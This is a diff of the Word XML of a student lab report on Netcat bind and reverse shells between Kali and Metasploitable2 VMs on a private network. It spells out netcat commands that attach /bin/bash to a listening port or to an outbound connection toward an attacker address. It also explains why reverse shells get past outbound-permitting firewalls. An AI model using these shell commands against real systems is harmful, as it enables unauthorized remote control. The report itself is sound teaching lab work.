+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> again returned </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>msfadmin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, and ls -la showed the same Metasploitable2 home directory as the bind shell. Changing into </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>kali_Documents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and creating names.txt with touch, then listing the directory again to see it appear, demonstrated that this is a fully interactive, persistent shell — not a one-off command — capable of navigating the filesystem and creating files, exactly like a normal terminal session on the target.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2096,7 +2497,29 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Figure 2 — Kali (right) listening and receiving Metasploitable2's outbound connection (left), then running commands on the target, including creating names.txt inside kali_Documents.</w:t>
+        <w:t xml:space="preserve">Figure 2 — Kali (right) listening and receiving Metasploitable2's outbound connection (left), then running commands on the target, including creating names.txt inside </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4D4D4D"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>kali_Documents</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="4D4D4D"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2268,7 +2691,25 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>nc -lvnp 4444 (Kali)</w:t>
+              <w:t>nc -</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>lvnp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 4444 (Kali)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2411,6 +2852,7 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2419,7 +2861,18 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>whoami result</w:t>
+              <w:t>whoami</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:color w:val="000000"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> result</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2439,6 +2892,7 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="262626"/>
@@ -2447,6 +2901,7 @@
               </w:rPr>
               <w:t>msfadmin</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2498,7 +2953,25 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>names.txt, created with touch inside kali_Documents on the target</w:t>
+              <w:t xml:space="preserve">names.txt, created with touch inside </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t>kali_Documents</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="262626"/>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> on the target</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2563,7 +3036,21 @@
               <w:rPr>
                 <w:color w:val="1A1A1A"/>
               </w:rPr>
-              <w:t>The reverse shell felt more realistic as an attack pattern: the target reaches out, so from the target's side it looks like ordinary outbound traffic rather than an open listening port waiting to be found. A firewall that blocks unsolicited inbound connections but allows outbound ones (a common default) would stop the bind shell in Section 1 but let this one through, which is exactly why reverse shells are the more commonly used technique in real engagements. Neither version here uses any encryption, so anyone capturing traffic on the network — which I could confirm later with tcpdump — would see every command and every reply in plain text.</w:t>
+              <w:t xml:space="preserve">The reverse shell felt more realistic as an attack pattern: the target reaches out, so from the target's side it looks like ordinary outbound traffic rather than an open listening port waiting to be found. A firewall that blocks unsolicited inbound connections but allows outbound ones (a common default) would stop the bind shell in Section 1 but let this one through, which is exactly why reverse shells are the more commonly used technique in real engagements. Neither version here uses any encryption, so anyone capturing traffic on the network — which I could confirm later with </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="1A1A1A"/>
+              </w:rPr>
+              <w:t>tcpdump</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="1A1A1A"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> — would see every command and every reply in plain text.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2602,7 +3089,25 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>The -e flag attaches a program to a Netcat connection, so its input and output travel over the network — this is what turns a plain pipe into a remote shell.</w:t>
+        <w:t xml:space="preserve">The -e flag attaches a program to a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connection, so its input and output travel over the network — this is what turns a plain pipe into a remote shell.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2639,7 +3144,25 @@
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Reverse shell: the attacker listens (nc -l) and the target connects out (nc -e /bin/bash &lt;attacker-ip&gt; &lt;port&gt;). This blends in better with normal outbound traffic and is the more commonly used pattern.</w:t>
+        <w:t>Reverse shell: the attacker listens (nc -l) and the target connects out (nc -e /bin/bash &lt;attacker-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>&gt; &lt;port&gt;). This blends in better with normal outbound traffic and is the more commonly used pattern.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2657,7 +3180,25 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>Once connected, either shell is fully interactive: whoami, ls -la, cd and touch all worked exactly as they would in a normal terminal session on the target.</w:t>
+        <w:t xml:space="preserve">Once connected, either shell is fully interactive: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="262626"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>, ls -la, cd and touch all worked exactly as they would in a normal terminal session on the target.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2796,13 +3337,23 @@
       </w:pBdr>
       <w:jc w:val="right"/>
     </w:pPr>
+    <w:proofErr w:type="spellStart"/>
     <w:r>
       <w:rPr>
         <w:color w:val="4D4D4D"/>
         <w:sz w:val="16"/>
         <w:szCs w:val="16"/>
       </w:rPr>
-      <w:t>Netcat Practical 3 — Bind &amp; Reverse Shell</w:t>
+      <w:t>Netcat</w:t>
+    </w:r>
+    <w:proofErr w:type="spellEnd"/>
+    <w:r>
+      <w:rPr>
+        <w:color w:val="4D4D4D"/>
+        <w:sz w:val="16"/>
+        <w:szCs w:val="16"/>
+      </w:rPr>
+      <w:t xml:space="preserve"> Practical 3 — Bind &amp; Reverse Shell</w:t>
     </w:r>
   </w:p>
 </w:hdr>

--- a/tools/Netcat_NC/Binding and Reverse Shell/Bind_Reverse_Shell.docx
+++ b/tools/Netcat_NC/Binding and Reverse Shell/Bind_Reverse_Shell.docx
@@ -27,7 +27,6 @@
         <w:spacing w:before="260" w:after="100"/>
         <w:jc w:val="center"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -36,18 +35,7 @@
           <w:sz w:val="60"/>
           <w:szCs w:val="60"/>
         </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="60"/>
-          <w:szCs w:val="60"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (nc)</w:t>
+        <w:t>Netcat (nc)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -79,29 +67,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">Hands-on lab practicals using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="4D4D4D"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="4D4D4D"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> between a Kali Linux VM and a Metasploitable2 target VM on a private VirtualBox host-only network.</w:t>
+        <w:t>Hands-on lab practicals using Netcat between a Kali Linux VM and a Metasploitable2 target VM on a private VirtualBox host-only network.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -129,7 +95,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Emmanuel Aidoo</w:t>
+        <w:t>Aidoo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -320,43 +286,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">Earlier practicals used a raw </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> connection to move a file, hold a chat, scan ports, and grab a service banner. The -e flag takes this a step further: instead of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> printing what it reads and writes to the screen, it hands the connection to a program, so that program's input and output travel over the network instead of the local terminal. Passing -e /bin/bash attaches a Bash shell to the connection, letting one machine run commands on the other and see the output.</w:t>
+        <w:t>Earlier practicals used a raw Netcat connection to move a file, hold a chat, scan ports, and grab a service banner. The -e flag takes this a step further: instead of Netcat printing what it reads and writes to the screen, it hands the connection to a program, so that program's input and output travel over the network instead of the local terminal. Passing -e /bin/bash attaches a Bash shell to the connection, letting one machine run commands on the other and see the output.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -706,23 +636,13 @@
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="262626"/>
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>Netcat</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> (nc), traditional version, as installed on Kali and Metasploitable2</w:t>
+              <w:t>Netcat (nc), traditional version, as installed on Kali and Metasploitable2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1151,31 +1071,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ nc -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>lvnp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 4444 -e /bin/bash</w:t>
+              <w:t>$ nc -lvnp 4444 -e /bin/bash</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1226,21 +1122,8 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">$ </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>whoami</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>$ whoami</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1288,110 +1171,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>nc -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>nc -lvnp 4444 -e /bin/bash tells Netcat to listen (-l) verbosely (-v), skip DNS lookups (-n), on port 4444 (-p 4444), and to hand any connection straight to /bin/bash (-e). Once Kali connected with a plain nc 192.168.56.102 4444, anything typed on the Kali terminal was sent to that Bash process running on Metasploitable2, and Bash's replies were sent back — with no visible prompt, since only the shell's actual output (not its prompt string) travels over a plain pipe like this.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="262626"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>lvnp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 4444 -e /bin/bash tells </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>Netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to listen (-l) verbosely (-v), skip DNS lookups (-n), on port 4444 (-p 4444), and to hand any connection straight to /bin/bash (-e). Once Kali connected with a plain nc 192.168.56.102 4444, anything typed on the Kali terminal was sent to that Bash process running on Metasploitable2, and Bash's replies were sent back — with no visible prompt, since only the shell's actual output (not its prompt string) travels over a plain pipe like this.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Running </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and ls -la from the Kali side confirmed the shell was real and running on the target: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> returned </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>msfadmin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (the account the listener was started as), and ls -la listed Metasploitable2's home directory, including the receiveed.txt file created in an earlier practical.</w:t>
+        <w:t>Running whoami and ls -la from the Kali side confirmed the shell was real and running on the target: whoami returned msfadmin (the account the listener was started as), and ls -la listed Metasploitable2's home directory, including the receiveed.txt file created in an earlier practical.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1459,29 +1252,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 1 — Metasploitable2 (left) running the bind-shell listener, and Kali (right) connected to it, running </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="4D4D4D"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="4D4D4D"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and ls -la on the target.</w:t>
+        <w:t>Figure 1 — Metasploitable2 (left) running the bind-shell listener, and Kali (right) connected to it, running whoami and ls -la on the target.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1653,25 +1424,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>nc -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>lvnp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="262626"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 4444 -e /bin/bash (Metasploitable2)</w:t>
+              <w:t>nc -lvnp 4444 -e /bin/bash (Metasploitable2)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1814,7 +1567,6 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -1823,18 +1575,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>whoami</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="000000"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> result</w:t>
+              <w:t>whoami result</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1854,7 +1595,6 @@
             <w:pPr>
               <w:keepNext/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="262626"/>
@@ -1863,7 +1603,6 @@
               </w:rPr>
               <w:t>msfadmin</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2112,31 +1851,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ nc -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>lvnp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 4444</w:t>
+              <w:t>$ nc -lvnp 4444</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2187,9 +1902,13 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">$ </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>$ whoami</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
@@ -2199,9 +1918,8 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>whoami</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>$ ls -la</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2216,37 +1934,8 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>$ ls -la</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="40"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">$ cd </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:b/>
-                <w:bCs/>
-                <w:color w:val="F0F0F0"/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t>kali_Documents</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>$ cd kali_Documents</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2326,110 +2015,20 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>This time Kali started the listener first with nc -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>This time Kali started the listener first with nc -lvnp 4444 — verbose, numeric, listening on port 4444 — and simply waited. On Metasploitable2, nc -e /bin/bash 192.168.56.101 4444 connected out to Kali's address and port and attached its own Bash process to that outgoing connection. As soon as the connection landed, the shell prompt on Kali's terminal effectively became Metasploitable2's shell: every command typed there (whoami, ls -la, cd, touch) ran on the target, not on Kali.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="262626"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>lvnp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 4444 — verbose, numeric, listening on port 4444 — and simply waited. On Metasploitable2, nc -e /bin/bash 192.168.56.101 4444 connected out to Kali's address and port and attached its own Bash process to that outgoing connection. As soon as the connection landed, the shell prompt on Kali's terminal effectively became Metasploitable2's shell: every command typed there (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>, ls -la, cd, touch) ran on the target, not on Kali.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="160" w:line="300" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The commands confirmed this: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="262626"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>whoami</w:t>
-      </w:r>
